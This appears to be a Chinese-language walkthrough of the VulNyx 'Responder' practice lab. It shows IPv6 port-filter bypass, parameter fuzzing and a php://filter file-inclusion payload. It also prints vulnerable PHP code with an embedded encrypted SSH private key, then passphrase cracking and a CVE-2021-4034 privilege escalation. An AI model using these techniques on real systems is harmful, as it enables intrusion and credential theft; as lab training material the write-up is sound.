VulNyx - Responder靶场

靶机ip 192.168.200.9

先nmap 扫描全端口

---

---

---

这个22端口不知道有没有开 被过滤了 我们 收集一下靶机的ipv6地址 nmap用ipv6地址扫他的端口就能绕过 他的端口过滤

ping6 ff02::1 收集ipv6地址

---

---

可以看到其实他的22端口就是开的

---

---

访问80端口没啥东西

dirsearch扫描一下 啥东西都没扫出来 gobuster 也没扫粗什么东西

---

---

---

用gobuster 的x参数采用更细致的扫描



发现有了一个filemanager.php文件 但是是个302跳转

这时候就要连蒙带猜了，见名知意这是个文件管理页面，那么既然是文件管理是不是就需要一个文件路径呢？

我们就fuzz一下这个文件参数

---

---

我用burp来fuzz他的参数



真的fuzz到了 是random

但还有一点值得注意的是 个人感觉应该是302跳转的原因 这些响应内容再浏览器访问是完全看不到的 只能在bp上发包查看响应才能读取到内容

---

---

那么接下来就简单了

这就是个任意文件读取漏洞了

可以读取到代码

php://filter/convert.base64-encode/resource=filemanager.php

点击查看代码

<?php
    $filename = $_GET['random'];
    include($filename);
    header('Location:/');

/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7
vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t
vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII
QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy
myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4
ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU
i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt
MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh
HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3
GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4
YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf
3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs
XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/
wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE
Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y
wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U
t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN
4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F
Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La
UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX
gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw
dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb
vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ
lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw==
-----END RSA PRIVATE KEY-----

*/

?>

---

---

很奇怪的是 既然这里是include 函数我们就可以直接利用伪协议执行php命令或者上传一句话木马了，但是尝试过了并没有成功，猜测是有过滤的，只能老老实实的继续做了

---

---

这个私钥应该就是ssh证书登录的私钥了

接下来我们只用破解私钥的解密密码就行了



破解出来了

---

---

查看etc/passwd 发现有个用户名就叫elliott

---

---

那么接下来就可以直接ssh证书登陆了

那么其实做到这里还没完

我们还要提权拿到root权限

---

---

---

发现有gcc 有 make应该是个内核漏洞

现在自己的kali里面下载好这个linux-exploit-suggester.sh扫描脚本

然后开个python http 在靶机里面wget下来这个脚本

---

---

用这个脚本扫一下发现会有几个cve

bash linux-exploit-suggester.sh

---

---

在自己的kali上下载好exp然后再次wget下来

然后unzip这个文件

但是我们会发现没有unzip命令 这个时候我们就要用busybox了

busybox是个集成了很多命令的工具 我们再命令行里面敲busybox发现确实有

---

---

---

然后我们就有busybox里面的unzip 对exp的zip解压

busybox unzip CVE-2021-4034-main.zip 这个exp直接在github上搜就有了

按照他exp里面的readme执行exp

拿下root权限